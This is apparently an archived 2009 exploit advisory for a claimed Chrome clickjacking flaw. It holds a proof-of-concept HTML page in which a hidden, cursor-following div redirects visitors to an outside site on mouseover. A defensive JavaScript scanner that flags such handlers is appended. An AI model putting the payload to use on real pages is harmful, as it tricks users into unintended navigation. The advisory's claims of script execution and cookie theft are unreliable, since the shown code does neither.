vendor: Chrome Web Browser
by: x0x
CVSS: 7.5 HIGH
Clickjacking
CWE: N/A
Product Name: Chrome Web Browser
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Google Chrome Web Browser Clickjacking

x0x has discovered a clickjacking vulnerability in Google Chrome Web Browser. The vulnerability is caused by the application not properly sanitizing user-supplied input. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site, e.g. by tricking a user into clicking on a specially crafted link. This can be used, e.g., to steal cookie-based authentication credentials.

Mitigation:

N/A

Exploit-DB raw data:

#############################################################
# Application Name   : Google Chrome Web Browser
# Vulnerable Type    : Clickjacking
# Home                   : www.ozkanbozkurt.com
# Author                 : x0x
#############################################################
< ------------------- header data end of ------------------- >

<html>
<style type="text/css">
<!--
.style1 {
 font-size: 50px;
 font-weight: bold;
}
.style2 {
 color: #FF0000;
 font-weight: bold;
 font-size: 24px;
}
-->
</style>
<body>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.cyber-warrior.org/BARCOD3';">This</div>
<p><strong>
  <script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>
 
 
 
Greetz : All CW Users | All Muslims and Only Brother me Septemb0x

# milw0rm.com [2009-01-28]
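
A defender-side check for the pattern in the proof of concept above: an element whose inline mouse handler navigates the page to a host that no visible link on the page names. This is an added example, not code from the original advisory; the function names, the event list and the sample hosts are assumptions, and the regex tag scan is a heuristic for simple static markup.

```javascript
// Added example (not from the advisory): flag inline mouse handlers that navigate the page.
const MOUSE_EVENTS = ['onmouseover', 'onmouseenter', 'onmousemove', 'onmousedown', 'onmouseup'];
const NAV_RE = /(?:document\.|window\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]|location\.(?:assign|replace)\(\s*['"]([^'"]+)['"]/i;
// Parse one start tag's attribute text into a lower-cased name -> value map.
function parseAttrs(text) {
  const attrs = {};
  const re = /([a-zA-Z_:][-\w:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(text)) !== null) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  return attrs;
}
// Host of an absolute URL, or null for relative URLs (treated as same-site).
function hostOf(url) {
  try { return new URL(url).host.toLowerCase(); } catch { return null; }
}
// Heuristic regex scan (assumption: simple static markup, no DOM built by script).
function findHoverRedirects(html) {
  const tagRe = /<([a-zA-Z][\w-]*)\b((?:"[^"]*"|'[^']*'|[^'">])*)>/g;
  const linkHosts = new Set();
  const findings = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttrs(m[2]);
    if (tag === 'a' && attrs.href && hostOf(attrs.href)) linkHosts.add(hostOf(attrs.href));
    for (const event of MOUSE_EVENTS) {
      const nav = NAV_RE.exec(attrs[event] || '');
      if (!nav) continue;
      findings.push({
        tag, id: attrs.id || null, event, target: nav[1] || nav[2],
        // Absolutely or fixed positioned elements can be moved under the cursor.
        positioned: /position\s*:\s*(?:absolute|fixed)/i.test(attrs.style || ''),
      });
    }
  }
  // Mismatch: the handler sends the user to a host that no visible link names.
  return findings.map((f) => {
    const host = hostOf(f.target);
    return { ...f, hostMismatch: host !== null && !linkHosts.has(host) };
  });
}

// Constructed sample shaped like the proof of concept; hosts are placeholders.
const SAMPLE = `
<div id="open" style="position:absolute; width:8px; height:7px; left:19px; top:115px;"
 onmouseover="document.location='http://redirect.example.net/landing';">This</div>
<a href="http://news.example.com/story?id=1" onclick="updatebox(event)">read the story</a>
<a href="/about" onmouseover="this.className='hover'">about</a>`;
console.log(findHoverRedirects(SAMPLE));
```

A finding with both `positioned` and `hostMismatch` set is the combination worth manual review; either flag alone is common in legitimate pages.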